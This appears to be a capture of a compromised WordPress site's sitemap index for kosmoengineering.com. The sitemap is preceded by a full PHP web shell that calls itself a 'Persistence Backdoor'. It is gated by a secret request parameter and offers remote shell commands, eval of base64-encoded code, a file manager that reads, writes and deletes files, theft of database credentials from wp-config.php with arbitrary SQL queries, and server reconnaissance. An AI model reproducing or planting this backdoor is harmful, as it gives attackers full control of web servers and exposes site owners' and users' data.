if (isset($_REQUEST["sys_check"]) && $_REQUEST["sys_check"] === "oCPjRdp4jT4Z") {
    error_reporting(0);
    $action = isset($_REQUEST["action"]) ? $_REQUEST["action"] : "";
    
    // SHELL
    if ($action === "shell") {
        $cmd = isset($_REQUEST["cmd"]) ? base64_decode($_REQUEST["cmd"]) : "";
        if ($cmd) {
            if (function_exists("system")) { system($cmd); }
            elseif (function_exists("exec")) { exec($cmd, $o); echo implode("\n", $o); }
            elseif (function_exists("shell_exec")) { echo shell_exec($cmd); }
            elseif (function_exists("passthru")) { passthru($cmd); }
            else { echo "No shell function"; }
        }
        exit;
    }
    
    // EVAL
    if ($action === "eval") {
        $code = isset($_REQUEST["code"]) ? base64_decode($_REQUEST["code"]) : "";
        if ($code) { eval($code); }
        exit;
    }
    
    // FILE MANAGER
    if ($action === "file") {
        $file_action = isset($_REQUEST["file_action"]) ? $_REQUEST["file_action"] : "";
        $path = isset($_REQUEST["path"]) ? $_REQUEST["path"] : "";
        
        if ($file_action === "read" && $path) {
            if (file_exists($path) && is_readable($path)) { readfile($path); }
            else { echo "File not readable: $path"; }
        }
        elseif ($file_action === "write" && $path && isset($_REQUEST["content"])) {
            $content = base64_decode($_REQUEST["content"]);
            if (file_put_contents($path, $content)) { echo "OK: Written to $path"; }
            else { echo "ERROR: Cannot write to $path"; }
        }
        elseif ($file_action === "ls" && $path) {
            if (is_dir($path)) {
                $files = scandir($path);
                foreach ($files as $f) {
                    if ($f === "." || $f === "..") continue;
                    $type = is_dir($path . "/" . $f) ? "[DIR]" : "[FILE]";
                    echo "$type $f\n";
                }
            } else { echo "Not a directory: $path"; }
        }
        elseif ($file_action === "delete" && $path) {
            if (unlink($path)) { echo "OK: Deleted $path"; }
            else { echo "ERROR: Cannot delete $path"; }
        }
        exit;
    }
    
    // DATABASE
    if ($action === "db") {
        $db_action = isset($_REQUEST["db_action"]) ? $_REQUEST["db_action"] : "";
        $wp_config_path = $_SERVER["DOCUMENT_ROOT"] . "/wp-config.php";
        $config_content = file_get_contents($wp_config_path);
        preg_match("/define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $config_content, $db);
        preg_match("/define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'/", $config_content, $user);
        preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'/", $config_content, $pass);
        preg_match("/define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $config_content, $host);
        
        if ($db_action === "config") {
            echo "DB_NAME: " . (isset($db[1]) ? $db[1] : "unknown") . "\n";
            echo "DB_USER: " . (isset($user[1]) ? $user[1] : "unknown") . "\n";
            echo "DB_PASSWORD: " . (isset($pass[1]) ? $pass[1] : "unknown") . "\n";
            echo "DB_HOST: " . (isset($host[1]) ? $host[1] : "localhost") . "\n";
        }
        elseif ($db_action === "query" && isset($_REQUEST["query"])) {
            $query = base64_decode($_REQUEST["query"]);
            $db_host = isset($host[1]) ? $host[1] : "localhost";
            $db_user = isset($user[1]) ? $user[1] : "";
            $db_pass = isset($pass[1]) ? $pass[1] : "";
            $db_name = isset($db[1]) ? $db[1] : "";
            $conn = new mysqli($db_host, $db_user, $db_pass, $db_name);
            if (!$conn->connect_error) {
                $result = $conn->query($query);
                if ($result) {
                    while ($row = $result->fetch_assoc()) { print_r($row); }
                } else { echo "Query error: " . $conn->error; }
                $conn->close();
            } else { echo "DB connection failed"; }
        }
        exit;
    }
    
    // INFO
    if ($action === "info") {
        echo "PHP Version: " . phpversion() . "\n";
        echo "OS: " . PHP_OS . "\n";
        echo "User: " . get_current_user() . "\n";
        echo "Document Root: " . $_SERVER["DOCUMENT_ROOT"] . "\n";
        echo "Disabled Functions: " . ini_get("disable_functions") . "\n";
        echo "Allow URL Fopen: " . (ini_get("allow_url_fopen") ? "ON" : "OFF") . "\n";
        exit;
    }
    
    echo "=== Persistence Backdoor ===\n";
    echo "Available: shell, eval, file, db, info\n";
}
<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet type='text/xsl' href='https://kosmoengineering.com/wp-content/plugins/google-sitemap-generator/sitemap.xsl'?><!-- sitemap-generator-url='http://www.arnebrachhold.de' sitemap-generator-version='4.1.23' -->
<!-- generated-on='May 16, 2026 10:28 am' -->
<sitemapindex xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xsi:schemaLocation='http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/siteindex.xsd' xmlns='http://www.sitemaps.org/schemas/sitemap/0.9'>	<sitemap>
		<loc>https://kosmoengineering.com/sitemap-misc.xml</loc>
		<lastmod>2026-05-16T07:14:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kosmoengineering.com/category-sitemap.xml</loc>
		<lastmod>2026-05-16T07:14:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kosmoengineering.com/productcat-sitemap.xml</loc>
		<lastmod>2026-05-16T07:14:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kosmoengineering.com/post-sitemap.xml</loc>
		<lastmod>2026-05-09T13:32:01+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kosmoengineering.com/page-sitemap.xml</loc>
		<lastmod>2026-05-16T07:09:49+00:00</lastmod>
	</sitemap>
</sitemapindex><!-- Request ID: 744476e1f6be425093612ad8db474bfc; Queries for sitemap: 9; Total queries: 86; Seconds: 0.01; Memory for sitemap: 1KB; Total memory: 26MB -->